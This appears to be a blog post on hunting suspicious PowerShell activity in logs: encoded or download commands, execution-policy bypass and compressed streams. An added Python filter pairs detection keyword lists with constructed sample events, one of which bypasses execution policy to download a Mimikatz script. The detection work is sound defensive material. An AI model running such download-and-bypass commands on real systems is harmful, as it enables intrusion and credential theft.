PowerShell is the most powerful scripting language available on Windows, with access to the operating system unlike any other tool out in the wild. Because it is so useful for administrative tasks, Windows security controls generally treat PowerShell as trusted and do not block what it executes.
Because security products trust it, adversaries use PowerShell to run commands in the hope of carrying out malicious activity: executing commands, leveraging encoded commands, obfuscation (with and without encoding), downloading additional payloads and launching additional processes.
In this blog post, we are going to see how to hunt for these suspicious PowerShell activities by focusing on the following attributes:
First we'll load our PowerShell log in Gigasheet, and it looks like this:
Now we can get started.
Malicious payloads are encoded and obfuscated and PowerShell commands are often used to download them from the internet. Usually in PowerShell encoding and obfuscation tend to go together.
To look for encoded and downloadable command line arguments, we need to look at PowerShell logs (either Sysmon or Windows PowerShell logs) and see if there is any match of the following in the command line arguments:
We are going to use Gigasheet to hunt for these in the PowerShell logs.
1. Filter the raw log (or, if you can filter on the command line column directly, do that) and enter the values listed above using the "contains" operator, combined with the OR condition.
2. Voila! Here is a sample match showing PowerShell being called to download a Mimikatz file from the internet.
Execution policy is a safety feature that controls the conditions under which PowerShell loads configuration files and runs scripts. This feature helps prevent the execution of malicious scripts. A popular execution policy that attackers tend to leverage is "Bypass". With the Bypass execution policy nothing is blocked and there are no warnings or prompts from the system.
The pattern we will use to hunt for this activity involves looking for command line arguments that start with parameters used to bypass the local execution policy for scripts.
1. Filter the raw log (or, if you can filter on the command line column directly, do that) and enter the values "-ExecutionPolicy bypass" or "-ep bypass" using the "contains" operator, combined with the OR condition.
2. The result below shows .ps1 files being run with the execution policy bypassed, ignoring all restrictions configured on the system. The second entry goes one step further and downloads a suspicious file while bypassing the control.
Stream commands are commonly used to process compressed files or to decompress binary data. These activities are expected when a user uses PowerShell to compress or decompress data; however, they are uncommon across an organization.
Suspicious PowerShell script execution can be detected via Event Code 4104 (script block logging), which captures the processing of compressed stream data. Such activity can be identified by looking for these strings in the logs: "IO.Compression", "IO.StreamReader", "]::Decompress", and that's exactly what we'll be filtering our logs for.
These streams can be used to store malware that bypasses security controls undetected and executes successfully, infecting the system.
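The three hunts above (download/encoded command lines, execution policy bypass, and compressed-stream strings in 4104 script blocks) can be expressed as one "contains, OR'd within a category" filter over parsed events. The following is an added example, not code from the post or from Gigasheet; it runs over constructed Sysmon event 1 and PowerShell 4104 records, and the download/encoded needles (Net.WebClient, DownloadString, Invoke-WebRequest, -EncodedCommand) are assumed, since the post's own list of those indicators is not reproduced here.

```python
"""Hunt Sysmon / PowerShell events for the three patterns discussed in the post."""

# Needles applied with a case-insensitive "contains", OR'd within each category,
# mirroring the Gigasheet filter. The first category's strings are an assumption:
# the post's own list of download/encoding indicators was not preserved here.
HUNT_PATTERNS = {
    "download_or_encoded": ["Net.WebClient", "DownloadString", "DownloadFile",
                            "Invoke-WebRequest", "-EncodedCommand", "-enc "],
    "execution_policy_bypass": ["-ExecutionPolicy bypass", "-ep bypass"],
    "compressed_stream": ["IO.Compression", "IO.StreamReader", "]::Decompress"],
}


def event_text(event):
    """Sysmon event 1 carries CommandLine; PowerShell 4104 carries ScriptBlockText."""
    return event.get("CommandLine") or event.get("ScriptBlockText") or ""


def classify(text):
    """Return the hunt categories whose needles appear in text (case-insensitive)."""
    hay = text.lower()
    return [cat for cat, needles in HUNT_PATTERNS.items()
            if any(n.lower() in hay for n in needles)]


def hunt(events):
    """Return (index, EventID, categories) for every event matching at least one pattern."""
    hits = []
    for i, ev in enumerate(events):
        cats = classify(event_text(ev))
        if cats:
            hits.append((i, ev["EventID"], cats))
    return hits


# Constructed sample events (not real telemetry); hosts and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": r"powershell.exe -ep bypass -File C:\Users\alice\update.ps1"},
    {"EventID": 1, "CommandLine": "powershell.exe -ExecutionPolicy Bypass -c "
     "\"(New-Object Net.WebClient).DownloadString('http://files.example.invalid/mimikatz.ps1')\""},
    {"EventID": 4104, "ScriptBlockText": "$ds = New-Object IO.Compression.DeflateStream($ms, "
     "[IO.Compression.CompressionMode]::Decompress); (New-Object IO.StreamReader($ds)).ReadToEnd()"},
    {"EventID": 1, "CommandLine": "powershell.exe -NoProfile -Command Get-Process"},
    {"EventID": 4104, "ScriptBlockText": r"Get-ChildItem C:\Logs | Measure-Object"},
]

if __name__ == "__main__":
    for idx, event_id, cats in hunt(SAMPLE_EVENTS):
        print(f"event[{idx}] EventID={event_id} -> {', '.join(cats)}")
```

The two benign events produce no hits, while the second event lands in both the download and the bypass categories, which is the "one step further" case the post describes.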